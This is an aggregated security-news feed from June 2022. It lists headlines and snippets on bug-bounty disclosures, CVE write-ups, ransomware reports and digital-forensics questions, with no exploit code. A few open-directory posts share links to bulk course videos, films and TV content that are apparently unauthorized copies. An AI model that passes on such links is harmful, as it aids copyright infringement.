    Reddit patches CSRF vulnerability that forced users to view NSFW content
    Article URL: https://portswigger.net/daily-swig/reddit-patches-csrf-vulnerability-that-forced-users-to-view-nsfw-content Comments URL: https://news.ycombinator.com/item?id=31779704 Points: 3 # Comments: 0
  • Open

    How to forensics copy Google Drive?
    Hello everyone! Excluding UFED and Magnet Axiom, is there any other software that provides a forensic acquisition of a Google Account / Google Drive? submitted by /u/Zipper_Ita [link] [comments]
    Dept just added a computer liaison program to our ranks. They are to assist with the Computer Crime Task Force. What trainings, certifications or programs can be recommended in taking outside of vendor specific training?
    Looking for some guidance to get certifications and trainings that my department may not be aware of. Outside of vendor specific and NW3C they really haven’t pushed much. Thank you in advance. submitted by /u/Embarrassed_Sky_1193 [link] [comments]
  • Open

    ISO 27001 Awareness Training & Quiz
    Hello! Do you know any ISO 27001 awareness training & quiz worthy of attention? It should be for all internal employees. It should be something not boring, and not difficult. submitted by /u/athanielx [link] [comments]
    Incorporating YARA Into Security Processes?
    Hey guys, I just recently learned about YARA and how it can help identify malware. I want to incorporate it into our current security processes, but to be honest, I'm sorta confused as to what we can truly do with it. YARA Rules sound very similar to just signature based AV. What real advantage does YARA provide and any tips on incorporating it into our daily routines? It seems to be valuable, but after multiple TI courses and YT videos, I'm still lacking the understanding of why it's valuable and how I can use it to better our security posture. submitted by /u/haroldhanson [link] [comments]
  • Open

    Cobalt Strike traffic analysis and intrusion detection
    Author: ainrm @ 薮猫科技 security services team. WeChat official account: 薮猫科技 (follow us) https://mp.weixin.qq.com/s/CjsqWrm70HVEnolZrRD8oA 1. Preface: Cobalt Strike is a team-collaboration tool for internal network penetration that plays an important role in red/blue exercises and testing. It is powerful and widely used, and every major security vendor has put it on its priority watch list. The common detection approaches are memory-based and traffic-based; this article takes the traffic angle and, through packet capture...
  • Open

    Dev-ops and lots of e-courses
    https://www.kgay4all.com/seioqueseiporleroqueleio/ submitted by /u/inoculatemedia [link] [comments]
    Bunch of dealer mode TV content
    Big files https://cdn.loewe.tv/movies/ submitted by /u/inoculatemedia [link] [comments]

  • Open

    OSINT Blog #1
    I’m going to use this page for a few reasons. Firstly, OSINT Dojo has several rankings, for which need you to have a go at an OSINT CTF… Continue reading on Medium »
    War in Ukraine / June 15
    War in Ukraine / June 15 Continue reading on Medium »
    OSINT: How Dangerous Is It?
    What exactly is OSINT?  Open Source Intelligence (OSINT) are collections of data that can be gathered for free from public sources and… Continue reading on Medium »
    Jihadist Snapshot: Daesh & AQ Trends — Monthly Analysis #3
    The Moonshot MEA (Middle East and Africa) Snapshot Series focuses on Moonshot’s online harms and violent extremism work across the Middle… Continue reading on Medium »
    Solving HariBahadur CTF
    URL to join the CTF: https://tryhackme.com/jr/haribahadur and can submit flags. The CTF is actually situated on… Continue reading on Medium »
  • Open

    That Pipe Is Still Leaking: Revisiting the RDP Named Pipe Vulnerability
    Article URL: https://www.cyberark.com/resources/threat-research-blog/that-pipe-is-still-leaking-revisiting-the-rdp-named-pipe-vulnerability Comments URL: https://news.ycombinator.com/item?id=31771796 Points: 2 # Comments: 0
  • Open

    Consolidate split .e01 image files into single file?
    While creating an image of a 128GB disk, I accidentally set it to split the image into 2GB files. For some situations, dealing with 18 files is not ideal. I'm wondering, is there a way to consolidate the split files into one file? Preferably without mounting the split image and creating a new one. submitted by /u/thenebular [link] [comments]
    Using write blocker to image a drive that is still in computer.
    Anyone have experience using a write blocker to connect and image in the following setup? laptop ——writeblocker—— laptop Any help would be nice, thanks! submitted by /u/mr_merica20 [link] [comments]
    Was given a .dist for NICE Inform, need to convert it to useable audio
    Hello, I've been tasked to combine 911 calls into a playable .mp4. The discovery package includes a .distribution that will only open with NICE Inform. I'm the most tech-savvy of the bunch, but this is really above my pay grade. If anyone has been able to free the audio files from this software before I'd appreciate any advice. Thank you. submitted by /u/Dcap16 [link] [comments]
  • Open

    Database attack and defense: MySQL
    MySQL is the most popular relational database and the one red teams encounter most often.
    From concept to security practice: a basic guide to the software supply chain
    Research shows attackers are actively targeting open-source components as a way into the software supply chain; attacks on open-source tooling rose 650% over the past 12 months.
    FreeBuf Morning Report | US Army applies cloud computing in live operations; Ukraine moves critical national data to neighboring countries
    The US Army is integrating cloud computing into the development and testing of its command post computing environment to provide continuous mission command at the tactical edge.
    Interpol seizes $50 million; over 2,000 "social engineers" arrested
    An international law enforcement operation codenamed "First Light 2022" seized $50 million in illicit proceeds worldwide and arrested thousands of people involved in social engineering fraud.
    "New Forces in Cybersecurity" founders alliance season arrives 22 June at 10:00!
    Meet seven cybersecurity founders and explore emerging technology trends in the industry.
    Building a low-latency, high-concurrency enterprise protection architecture | CIS summer edition topic preview
    Keeping pace with the evolving threat landscape, how should the WAF of the digital era evolve? CIS security experts will tell you!
    Serious vulnerability in email giant Zimbra lets hackers log in without a password
    By exploiting the vulnerability, attackers can steal login credentials without authentication or user interaction.
    Cisco email security vulnerability lets attackers log in to the web management interface
    The vulnerability could allow an attacker to bypass authentication and log in to the web management interface of Cisco email gateway appliances.
    Attackers exploit a three-year-old Telerik vulnerability to deploy Cobalt Strike
    A threat actor known as Blue Mockingbird exploits Telerik UI vulnerabilities to compromise servers and install Cobalt Strike beacons.
  • Open

    That Pipe is Still Leaking: Revisiting the RDP Named Pipe Vulnerability
    submitted by /u/jat0369 [link] [comments]
    Analysing RTF files from SideWinder APT
    submitted by /u/OwnPreparation3424 [link] [comments]
    CVE-2022-23088: Exploiting a Heap Overflow in the FreeBSD Wi-Fi Stack
    submitted by /u/Gallus [link] [comments]
    The Android kernel mitigations obstacle race
    submitted by /u/0xdea [link] [comments]
    Quick Malware Analysis Using Free Tools: Malware infection from Brazil malspam pcap from 2022-04-19
    submitted by /u/dougburks [link] [comments]
    VED (Vault Exploit Defense): Open source implementation
    submitted by /u/hardenedvault [link] [comments]
    Shadow Credentials - Red Teaming Experiments
    submitted by /u/Kondencuotaspienas [link] [comments]
    DriftingCloud: Zero-Day Sophos Firewall Exploitation and an Insidious Breach
    submitted by /u/cryptogram [link] [comments]
  • Open

    xmlrpc file enabled
    Yelp disclosed a bug submitted by happykira0x1: https://hackerone.com/reports/1575401
    curl "globbing" can lead to denial of service attacks
    curl disclosed a bug submitted by iylz: https://hackerone.com/reports/1572120
    CSRF (protection bypassed) to force a below 18 user into viewing an nsfw subreddit !
    Reddit disclosed a bug submitted by marvelmaniac: https://hackerone.com/reports/1480569 - Bounty: $500
    Stored XSS on TikTok Live Form
    TikTok disclosed a bug submitted by aidilarf_2000: https://hackerone.com/reports/1542703 - Bounty: $1500
  • Open

    How I secured an ISP (Internet Service Provider)
    Hello everyone hope all are safe and doing good. I am Cypher_Jerry Aka Harsha from Telangana, and a part-time bug bounty hunter. Continue reading on Medium »
    Bypass Email Confirmation
    Hello everyone. In this blog, I will share my finding on How I was able to bypass the email confirmation by just paying close observation… Continue reading on Medium »
    The Helio Bounty Program is now live
    We are pleased to announce the official start of the Helio Bounty Program for our community and security researchers. It is critical to… Continue reading on Medium »
    All one-liners for bug bounty hunters
    Check all the one-liners below. Continue reading on Medium »
    $700 Bounty writeup
    Hello readers, Continue reading on Medium »
    Hacking into WordPress themes for CVEs and Fun.
    Hi there! I hope all is well with you. In this writeup, I’ll discuss about the research I did on a WordPress theme, which taught me a lot… Continue reading on Pentester Nepal »
    Aurora Stalls A Sizable DeFi Hack, Pays $6M Bug Bounty through Immunefi
    It could have been the next market-moving DeFi hack, but thanks to bug bounty! Continue reading on Medium »
    CSRF leads to account takeover in Yahoo!
    How I managed to hack the accounts of arbitrary users of a Yahoo! application in only 30 minutes. Continue reading on Medium »
    XSS Blind Stored at Asset Domain Android Apps TikTok
    Hi everyone Continue reading on Medium »
  • Open

    Caldera: Red Team Emulation (Part 1)
    This article aims to demonstrate an open-source breach & emulation framework through which red team activity can be conducted with ease. It focuses on MITRE The post Caldera: Red Team Emulation (Part 1) appeared first on Hacking Articles.
  • Open

    Are these skills enough to get me a decent entry-level job in pentesting?
    I am studying engineering (1.5 years left to graduate) and want to drop out badly. I am based in Egypt and wondering if these skills are enough to get me a decent entry-level job in pentesting (remote or not) once I drop out: - 2 years' experience in bug bounty hunting (only about 20 valid bugs, because it was alongside college (XSS, info disclosures, etc.)) - solid programming experience (I've been programming as a hobby for over 6 years). Honestly, that's about it; I also know stuff like basic networking, Linux (my main OS), the OWASP Top Ten and more, but the two points I mentioned earlier are the best of what I can put on a resume. I also went for the OSCP once and failed; I'm going to retake it but don't want to put it here as a certainty, of course :) Let's say I take a few months after dropping out to improve my resume, start a blog, write a few technical writeups, explain sec stuff and whatnot, and also maybe find a few CVEs to add to my resume. Is this enough to start applying? How will not having a degree affect my chances? submitted by /u/watermelonSoundsNice [link] [comments]
  • Open

    CVE-2022-23088: Exploiting a Heap Overflow in the FreeBSD Wi-Fi Stack
    Article URL: https://www.thezdi.com/blog/2022/6/15/cve-2022-23088-exploiting-a-heap-overflow-in-the-freebsd-wi-fi-stack Comments URL: https://news.ycombinator.com/item?id=31768705 Points: 111 # Comments: 9
  • Open

    Attacks on Blockchain
    No content preview
  • Open

    SecWiki News 2022-06-16 Review
    Cobalt Strike traffic analysis and intrusion detection by ourren; Google's direction for the future of cloud security (CISO cloud security transformation guide white paper) by ourren; Research and analysis of CyberBattleSim (automated internal network penetration) by ourren; Event knowledge graphs in one article by ourren; A capability model for information security BPs by ourren; Interpretation and impact analysis of the BIS "Information Security Controls: Cybersecurity Items" rule by ourren; Translation of "Survey of Existing SBOM Formats and Standards" by ourren. For more recent articles, visit SecWiki
  • Open

    IOC-based threat hunting for free and without registration
    submitted by /u/Cultural_Budget6627 [link] [comments]
  • Open

    Hang Fire: Challenging our Mental Model of Initial Access
    For as long as I’ve been working in security, initial access has generally looked the same. While there are high degrees of variation… Continue reading on Posts By SpecterOps Team Members »
  • Open

    How to see the impact installing BApps might have on Burp Suite
    If you've ever installed any Burp extensions from the BApp Store, you'll know that it's a great way to extend your capabilities and tailor Burp Suite to your every need. If you've not, then what are y
  • Open

    Lots of education videos & classes from few different sources
    I haven't been through all of these yet, but it seems to be up-to-date stuff. http://s28.bitdl.ir/Video/ submitted by /u/Allouttagoodnames [link] [comments]
    Help me!!!!
    Can anyone help me find the link, or know where I can download season 1 of the Gentleman Jack series? I’ve searched for too long. Please help. submitted by /u/Bubbless02 [link] [comments]
  • Open

    CodeQL 数据库创建原理分析
    Author: 六炅. This article is a reader submission; Seebug Paper looks forward to your contributions, and every accepted piece receives a gift! Submission mailbox: paper@seebug.org. Preface: CodeQL is a good code analysis and scanning tool, and for me it has been a great help in vulnerability hunting. I have used it for some time; previously I always worked with open-source projects, so creating and analyzing databases with CodeQL was relatively simple and not very constrained. Recently, while hunting Java deserialization gadget chains, I encountered...

  • Open

    OSINT: the art of discovering the existing
    By Luli Rosenberg Continue reading on Medium »
    War in Ukraine / June 14
    Europe wants Ukraine to prepare for negotiations Continue reading on Medium »
    404CTF — Name of a new [extreme] recruit #OSINT
    Continue reading on Medium »
  • Open

    Rate limit Bypass on contact-us through IP Rotator (burp extension)(https://www.linkedin.com/help/linkedin/solve/contact)
    LinkedIn disclosed a bug submitted by sachinrajput: https://hackerone.com/reports/1578121
    Delete direct message history without access the proper conversation_id
    Twitter disclosed a bug submitted by saiful6601: https://hackerone.com/reports/1487804 - Bounty: $560
    Remote 0click exfiltration of Safari user's IP address
    Twitter disclosed a bug submitted by max2x: https://hackerone.com/reports/1392211 - Bounty: $560
    The software does not implement sufficient measures to prevent multiple failed authentication attempts within in a short time frame, making it more su
    LinkedIn disclosed a bug submitted by suryasnn: https://hackerone.com/reports/1591504
    Golang : Add Query To Detect PAM Authorization Bugs
    GitHub Security Lab disclosed a bug submitted by porcupineyhairs: https://hackerone.com/reports/1597437 - Bounty: $1800
    Golang : Hardcoded secret used for signing JWT
    GitHub Security Lab disclosed a bug submitted by porcupineyhairs: https://hackerone.com/reports/1595009 - Bounty: $1800
    CPP: Add query for CWE-243 Creation of chroot Jail Without Changing Working Directory
    GitHub Security Lab disclosed a bug submitted by ihsinme: https://hackerone.com/reports/1582697 - Bounty: $1000
    Hyper Link Injection while signup
    UPchieve disclosed a bug submitted by 011alsanosi: https://hackerone.com/reports/1166073
  • Open

    A new vulnerability in Intel and AMD CPUs lets hackers steal encryption keys
    Article URL: https://arstechnica.com/information-technology/2022/06/researchers-exploit-new-intel-and-amd-cpu-flaw-to-steal-encryption-keys/ Comments URL: https://news.ycombinator.com/item?id=31759171 Points: 1 # Comments: 1
    SynLapse – Technical Details for Critical Azure Synapse Vulnerability
    Article URL: https://orca.security/resources/blog/synlapse-critical-azure-synapse-analytics-service-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=31752026 Points: 1 # Comments: 0
    SynLapse – Technical Details for Critical Azure Synapse Vulnerability
    Article URL: https://orca.security/resources/blog/synlapse-critical-azure-synapse-analytics-service-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=31748624 Points: 4 # Comments: 0
  • Open

    Pulling MikroTik into the Limelight
    submitted by /u/0xdea
    Breaking Secure Boot on Google Nest Hub (2nd Gen) to run Ubuntu
    submitted by /u/Gallus
    Pwn2Own 2021 Canon ImageCLASS MF644Cdw writeup
    submitted by /u/alain_proviste
    TPM Sniffing Attacks Against Non-Bitlocker Targets
    submitted by /u/Gallus
    Bypassing CSP with dangling iframes
    submitted by /u/Gallus
  • Open

    Red Teaming reconnaissance Process
    Table of Contents Continue reading on Medium »
    Bug Bounty — Injection Part
    Injection flaws are very common in applications today. These flaws occur because user controlled input is interpreted as actual commands… Continue reading on Medium »
    PhpMyAdmin Setup is Accessible Without Authentication
    Description: Continue reading on Medium »
    Getting Started with AllianceBlock DEX on Mainnet
    We walk you through how to use the AllianceBlock DEX, as well as some updates on our progress on the development since we launched. Continue reading on Medium »
    Bypassing OTP verification
    We know that security is the main method of defense against hacker attacks. Some of these safeguards have not been prevailed… Continue reading on System Weakness »
  • Open

    Practical Network Penetration Free Live Course
    submitted by /u/MDCDF
    RAM acquisitions are extremely useful, but not often collected. This video shows how to speed up suspect password cracking with wordlists generated from RAM.
    submitted by /u/DFIRScience
  • Open

    Doubt about having authenticators on a separate device
    Hello, Last year I almost got robbed with violence in the street. The robbers couldn't steal anything (they tried to take my phone). Since that day, I bought another device and set up the authenticators there. That device will never leave my home, so, in case someone tries to rob me or I lose my main phone, my accounts won't get affected. In case of travel, I take the backup codes with me. Do you think this is secure? Thanks for the help and have a good day. Edit: that device only has the authenticators installed and the antivirus. So, it's completely clean. submitted by /u/SilverPigtail
    Gift for cybersecurity analyst
    Hi! Apologies if you get questions like this a lot, but I haven't seen anything in the last few months about it and I'm not sure how quickly the landscape changes. My husband is a cybersecurity analyst (comp eng degree) and is pretty interested in related things. For instance, I got him a Raspberry Pi and a pinewatch the last few bdays and he loved that. Would anybody have any suggestions for a gift? No particular price range as it's a big birthday coming up. Thanks in advance for any advice!! submitted by /u/roberl8
  • Open

    SecWiki News 2022-06-15 Review
    Google's thinking on building the SOC of the future (Automated Security Operations white paper) by ourren; Using Python to mine the gold mine of threat intelligence in leaked logs by ourren; Practical development of automated penetration-testing tools by ourren. For more of the latest articles, visit SecWiki
  • Open

    What I Learned In This Week In Cyber 6/16/22
    This week has been quite exciting in terms of the concepts explored. Here is a highlight of some of the concepts I delved into: Continue reading on CodeX »
    What I Learned In This Week In Cyber 6/16/22
    This week has been quite exciting in terms of the concepts explored. Here is a highlight of some of the concepts I delved into: Continue reading on Medium »
  • Open

    [Security Bulletin] Microsoft's June 2022 Patch Tuesday fixes multiple high-severity vulnerabilities
    Microsoft recently released its June 2022 security patches, fixing 55 vulnerabilities across 33 Microsoft products, including 12 privilege escalation, 1 security feature bypass, 27 remote code execution and 11 information disclosure...
  • Open

    Some Website Back-ends
    Website back-ends with some image assets, vectors, and templates. https://16stitches.com/assets/frontend/images/ http://hotelgreenridge.com/wp-content/uploads/ https://huemint.com/assets/ submitted by /u/amritajaatak
    [French Language Only] Limited Number of Films & TV Series
    http://www.vodservices-ftp.com/FTP_Upload/TEM/ submitted by /u/worldbbbbfree
  • Open

    FreeBuf Morning Report | Nigeria drafts rules to regulate internet companies; Google fixes 7 Chrome browser vulnerabilities
    The newly revised Provisions on the Administration of Mobile Internet Application Information Services take effect on 1 August 2022.
    Malware made it onto the Google Play store, with downloads exceeding 2 million
    Last month, security researchers found adware and information-stealing malware in the Google Play store.
    A new twist on ransomware: victims are invited to check for themselves whether their data was stolen
    To make extortion more efficient, the BlackCat ransomware gang set up a dedicated website that lets victims check whether their data was stolen in the attack.
    The Provisions on the Administration of Mobile Internet Application Information Services take effect on 1 August
    The new Provisions have 27 articles, covering the primary responsibility for information content, real-identity verification, category-based management, industry self-regulation, social oversight and administrative management.
  • Open

    AdmirerToo from HackTheBox — Detailed Walkthrough
    No content preview
    Phishing Domain Detection using Neural Networks
    Applying neural networks on domain name analysis to detect phishing Continue reading on InfoSec Write-ups »
  • Open

    Next-generation Windows exploitation: attacking the Common Log File System
    Authors: 360 Vulnerability Research Institute, 许仕杰 宋建阳 李林双. Original link: https://vul.360.net/archives/438 Overview In the past two years the Common Log File System module (clfs) has become a hot spot in Windows platform security research. This article first introduces some background on clfs, then describes how we fuzzed this target, and finally shares several vulnerability cases and how we used a new method to achieve local privilege escalation. Background According to Microsoft...
    A brief analysis of exploiting the Adobe Reader vulnerability CVE-2021-44711
    Authors: 360 Vulnerability Research Institute, 李双 王志远 willJ. Original link: https://vul.360.net/archives/434 Background In the security patches released this January, Adobe Reader fixed a vulnerability reported by the Cisco Talos security team, CVE-2021-44711; after analysis, it turned out to be the same vulnerability we used to complete our exploit. The vulnerability lies in the annotation-interacting JavaScri...
    Vulnerability hunting in rack-mounted devices
    Author: 360 Vulnerability Research Institute. Original link: https://vul.360.net/archives/413 0x01 Introduction The core of IoT device vulnerability hunting is really obtaining the "software" that runs inside the hardware device, after which it turns into ordinary software vulnerability hunting. The remaining steps are the same as for software: reverse engineering and auditing. This article mainly introduces the steps and approach for hunting vulnerabilities in rack-mounted and virtual-image security devices such as firewalls and bastion hosts, and also presents some vulnerabilities in related devices...
    Math.abs JIT Optimization Bug in JSC
    Author: 360 Vulnerability Research Institute, 戴建军. Original link: https://vul.360.net/archives/397 At Tianfu Cup 2021 we successfully achieved the iPhone 13 Pro RCE target; this article describes in detail the Safari JavaScriptCore (JSC) vulnerability used, CVE-2021-30953. ArithNegate During JSC's JIT FTL optimisation, for an expression -n ...
    USMA: User-Space Mapping Attack
    Authors: 360 Vulnerability Research Institute, 刘永 王晓东 姚俊. Original link: https://vul.360.net/archives/391 Overview As is well known, ROP is a mainstream Linux kernel exploitation technique. It requires the attacker to find usable gadgets based on the vulnerability, which is very time- and effort-consuming, and sometimes no suitable gadget can be found at all. Moreover, since the CFI (control-flow integrity) exploit mitigation has been merged into the Linux kernel mainline, ...
  • Open

    CVE-2022-29143 Microsoft SQL Server Remote Code Execution
    Article URL: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-29143 Comments URL: https://news.ycombinator.com/item?id=31748201 Points: 4 # Comments: 0

  • Open

    Counting in Regexes Considered Harmful: Exposing ReDoS Vulnerability of Nonback
    Article URL: https://www.usenix.org/conference/usenixsecurity22/presentation/turonova Comments URL: https://news.ycombinator.com/item?id=31747225 Points: 1 # Comments: 0
    Intel and AMD Hertzbleed CPU Vulnerability Uses Boost Speed to Steal Crypto Keys
    Article URL: https://www.tomshardware.com/news/intel-amd-hertzbleed-cpu-vulnerability-boost-clock-speed-steal-crypto-keys Comments URL: https://news.ycombinator.com/item?id=31745490 Points: 1 # Comments: 0
    SynLapse – Technical Details for Critical Azure Synapse Vulnerability
    Article URL: https://orca.security/resources/blog/synlapse-critical-azure-synapse-analytics-service-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=31741670 Points: 7 # Comments: 1
  • Open

    Why Are My Junctions Not Followed? Exploring Windows Redirection Trust Mitigation
    Junctions are a feature of the NT file system – and a common way that attackers exploit file system redirection attacks. Learn about mitigation. The post Why Are My Junctions Not Followed? Exploring Windows Redirection Trust Mitigation appeared first on Unit 42.
  • Open

    Developer's mistakes lead to full ATO!
    A wise man once said "In order to get high quality bugs, start playing with the website's functionalities." Continue reading on Medium »
  • Open

    Windows Subsystem for Linux
    I am doing an investigation right now and found an ext4.Vhdx. When I researched this file it said that it would most commonly be associated with WSL, allowing a user to run Linux commands without having to boot into a Linux partition. Is there any potential forensic value found here? And how do I get it to open? I exported it out and tried processing it with Axiom, but it didn't really work. Edit: I was able to get it extracted from its zip file and loaded into Axiom. Looks like it is 256GB in size, but there are no files active. It is just empty space. Am I missing something, or could this be some sort of thing where the user or malicious actor set it up and never used it? submitted by /u/trex4n6
    Entry level certification recommendations
    Hi all, I am wondering what certifications you would recommend for someone going into DF? I am going to Kent State in the fall to get my BS in Computer Engineering Technology with a minor in computer forensics and security. I want recommendations for certifications that I could take as a HS grad. Thanks submitted by /u/swatteam23
    Passware on T2 MacBook Air help.
    I have a MacBook Air (2020) with T2 and password protected. I'm trying to use Passware's new T2 option and use a custom dictionary attack. I'm getting stuck at the DFU stage. Can someone private message me if they have any experience? Other details: I've used multiple different cables without success. I'm using my forensic MacBook Pro, Big Sur. submitted by /u/james1234cb
    Locked Cellphone
    So I have a locked cellphone and was recommended a software that is way too expensive. Since it is just one phone, it was mentioned that back in the day they sent it to CAS. Anyone know more about the services/lab, for example is it an accredited lab? I'm going to reach out to them, but in the meantime I thought I would try here. Has anyone brought one of these devices to court after CAS touched it? submitted by /u/fanmajor2
    Volatility2 RHEL 8 profile
    I'm attempting to use Volatility to perform memory analysis on a RHEL8 .vmem file. Unfortunately the latest RHEL profile available at https://github.com/volatilityfoundation/profiles is for 6.7. I did see some example CLI where a LinuxRedhat8_3_4_18_0-240x64 profile was used. Can anyone by chance link/send me a RHEL8 profile for Volatility? submitted by /u/Styrophoams
  • Open

    Red-Team Project Management
    Say you perform a red team assessment in a network. How do you keep track of your tools, agents, etc. that you've deployed during your project? Do you use any kind of software for documenting and saving your artifacts? How do you manage it when working with multiple people on your team? submitted by /u/w0rmh013x
    Why is it important to remove stale devices in AD?
    I understand why it's important to delete inactive users in AD, but why should we remove unused/dead devices? What are the security risks? submitted by /u/athanielx
    What exactly does UPnP do?
    I have been reading about UPnP, and I am stuck at whether we need to submit the wifi password in the UPnP device to connect it to a network? It says UPnP can auto configure and doesn't need authentication. We can simply specify the port number and it connects the device to that service. Does our smartphone use UPnP when getting connected to a Wifi network? What devices use UPnP? submitted by /u/mkkedia3
    Vivo Fibra with public IP routers, safe?
    Hi, hope you're all alright! So, Vivo is my ISP here in Brazil and they send their own router for you to connect to their fiber providers. These routers however have their public IP open to the internet, which I can only imagine is for support reasons. Through this IP, you can actually access the router interface (http, not https), with things like hardware model, serial number and software version freely accessible; only the configuration page is behind a login form. My fear is this is not a secure setup. I even searched my hardware model and found out a big CVE where you could get access through ssh, but I think it is fixed on my machine. Another weird thing is the DNS6 servers (2001:12e0:0:1025:a080::115 and others), which cannot be changed. You can actually search this DNS on Google and find many such routers there. I never trusted Vivo, so I always used a personal router where my devices are connected and disabled their WiFi. I'm now disabling their IPv6, to avoid this Google thing. But is this safe? Are my fears not based on reality? submitted by /u/TiagodePAlves
  • Open

    Hertzbleed - a new family of side-channel attacks
    submitted by /u/CyberMasterV
    Oblivious HTTP
    submitted by /u/nangaparbat
    Zimbra Email - Stealing Clear-Text Credentials via Memcache injection
    submitted by /u/0xdea
    CVE-2022-25845 – Analyzing the Fastjson “Auto Type Bypass” RCE vulnerability
    submitted by /u/SRMish3
    What if you don't secure SSH on EC2? - Analysis of the real threats
    submitted by /u/capitangolo
    Chaining vulnerabilities to criticality in Progress WhatsUp Gold
    submitted by /u/Mempodipper
    Credential Protection in Chromium-based Browsers
    submitted by /u/jat0369
    If you want to play with Dogwalk windows vulnerability
    submitted by /u/cryptaureau
    Quick Malware Analysis: Emotet Epoch 5 infection with spambot traffic pcap from 2022-04-04
    submitted by /u/dougburks
  • Open

    Analysis of Chinese aircraft carriers: their history, modifications, spotted places, and what the…
    The president of the United States, Joe Biden, has answered “yes” during a press conference on May 23, 2022 in South Korea, to the… Continue reading on Medium »
    Introduction to OSINT
    Open Source Intelligence (OSINT) is a collective term used to describe all techniques and tools used to harvest information from publicly… Continue reading on Medium »
    War in Ukraine / June 13
    Russia earned $98 billion from energy exports in 100 days of war Continue reading on Medium »
  • Open

    Introducing Ghostwriter v3.0
    The Ghostwriter team recently released v3.0.0. This release represents a significant milestone for the project, and there has never been a… Continue reading on Posts By SpecterOps Team Members »
    One day of the Cyber Security team at KBTG
    Although the nature of the work of the three teams differs, we share one and the same goal: keeping the bank safe from cyber threats. Continue reading on KBTG Life »
    How to set up and operate a red team in your company to support a sustainable cybersecurity…
    Hack yourself to prevent from being hacked. This more or less describes the term "Red Teaming." But why do you need a red team though you… Continue reading on CodeX »
    How to set up and operate a red team in your company to support a sustainable cybersecurity…
    Hack yourself to prevent from being hacked. This more or less describes the term "Red Teaming." But why do you need a red team though you… Continue reading on Medium »
  • Open

    SecWiki News 2022-06-14 Review
    Cloud I Hack into Google Cloud by h4ck01; A glimpse of Shodan and Censys scanning by Avenger. For more of the latest articles, visit SecWiki
  • Open

    THQ Nordic - Media and Game Assets
    submitted by /u/xD3CrypTionz
  • Open

    How I found a Critical Bug in Instagram and Got 49500$ Bounty From Facebook
    No content preview
  • Open

    HTML Injection in E-mail
    Acronis disclosed a bug submitted by mega7: https://hackerone.com/reports/1536899
    Reflected Cross Site Scripting at ColdFusion Debugging Panel http://www.grouplogic.com/CFIDE/debug/cf_debugFr.cfm
    Acronis disclosed a bug submitted by ub3rsick: https://hackerone.com/reports/1166918
    Reflected Cross Site Scripting at http://www.grouplogic.com/files/glidownload/verify3.asp [Uppercase Filter Bypass]
    Acronis disclosed a bug submitted by ub3rsick: https://hackerone.com/reports/1167034
    Rails::Html::SafeListSanitizer vulnerable to xss attack in an environment that allows the style tag
    Ruby on Rails disclosed a bug submitted by windshock: https://hackerone.com/reports/1530898
  • Open

    The National Information Security Standardization Technical Committee (TC260) releases a draft for comment of the Guide to Managing App Personal Information Processing Activities
    The draft provides guidance for mobile smart terminals on designing app personal-information security functions and managing personal-information security risks, so that apps' collection of personal information is disclosed more explicitly.
    Stay alert: the HelloXD ransomware may be deploying a new backdoor on your systems
    Observers recently found that the HelloXD ransomware has deployed a new backdoor, MicroBackdoor, intended to strengthen its persistent remote access to infected hosts.
    FreeBuf Morning Report | Microsoft ends support for Internet Explorer today; cyber-security risks of smart commercial buildings come to the fore
    After support ends, it is replaced by the new Chromium-based Microsoft Edge, and users launching IE11 are automatically redirected to Edge.
    Fake direct-message phishing, impersonated artists, overpriced resales: common NFT scams
    Some common scams involving NFTs; learn to recognise them and avoid being taken in.
    Post-quantum cryptography: changing online security
    In essence, cryptography is simply a means of protecting and encrypting information.
    Russia's Sandworm group exploits the Follina vulnerability to breach key Ukrainian institutions
    Ukraine's Computer Emergency Response Team (CERT) warns that the Russian hacking group Sandworm may be exploiting the vulnerability known as Follina to attack Ukraine.
    45% of cyber-security practitioners are considering leaving the field because of excessive stress
    The stress comes mainly from the relentless threat of ransomware and the need to be on call at all times.
    When will the SASE market take off?
    The SASE market still needs 3 to 5 years to take off; remote work and IoT will be favourable factors driving the market in the short term and are worth watching.
    Yibin Kaiyi Automobile Co., Ltd. job postings
    Job postings from Yibin Kaiyi Automobile Co., Ltd.
    WiFi probing is tracking you and leaking your privacy
    WiFi probing can easily obtain all kinds of private information about users and can also track them in real time.
    Microsoft: Exchange servers are being used to deploy BlackCat ransomware
    According to a BleepingComputer report on 13 June, attackers are hitting vulnerable Microsoft Exchange servers with BlackCat ransomware. In the cases observed by Microsoft security experts, the attackers used an unpatched Exchange server as the entry vector for the initial attack, and two weeks later deployed the BlackCat ransomware payload on the network via PsExec. "While common entry vectors for these threat actors include remote desktop applications and compromised credentials
  • Open

    CVE-2022-26134 being exploited to download and deploy the Cerber2021 ransomware
    Article URL: https://twitter.com/MsftSecIntel/status/1535417779960131584 Comments URL: https://news.ycombinator.com/item?id=31735573 Points: 2 # Comments: 0
  • Open

    Analysis Report on Recent Hidden Malicious Code Sites on a Chinese HFS HTTP File Servers
    submitted by /u/Late_Ice_9288

  • Open

    Exposed Travis CI API Leaves All Free-Tier Users Open to Attack
    submitted by /u/mkatch
    The many lives of BlackCat ransomware
    submitted by /u/SCI_Rusher
    JWT attacks (with online labs)
    submitted by /u/albinowax
    Privilege Escalation in Microsoft Azure Synapse Analytics
    submitted by /u/dinobyt3s
    The State of CSRF Vulnerability in 2022
    submitted by /u/utku1337
  • Open

    Tenable CTF 2022 — Babby Web 2
    Same link? I wasn’t so sure at first. After poking a bit, I read the challenge again and “authentic” finally stuck out. This should have… Continue reading on Medium »
    Careers in Cyber | TryHackMe
    Lab Access: https://tryhackme.com/room/careersincyber Continue reading on Medium »
  • Open

    Hello
    What's your opinion on antiviruses? Because my mum is always saying "u nid antavarus coz money bank omy god ur so trash at computers" while most antivirus programs are just a money rip-off and you can just use your brain when using the computer submitted by /u/xblacky11
    How to secure a Bind DNS server exposed to the Internet?
    Any tools, utilities or recommendations to detect and block DNS attacks like amplification? Please note that the server has to be exposed to the Internet. submitted by /u/aim4r
    PASTA real-life example
    I am looking for some real-life examples of PASTA applied to an organization/application. I have an understanding of the process, the seven stages etc. I would like to see some actual inputs and outputs of all the seven stages. Is there anything like that available anywhere? submitted by /u/palm_snow
  • Open

    War in Ukraine / June 10–12
    Ukraine needs 1,000 howitzers Continue reading on Medium »
    Fingerprinting email senders…
    Hello… Today we will discuss fingerprinting (logging) email senders. First, what is logging. This is the logging process i.e. information… Continue reading on Medium »
  • Open

    SecWiki News 2022-06-13 Review
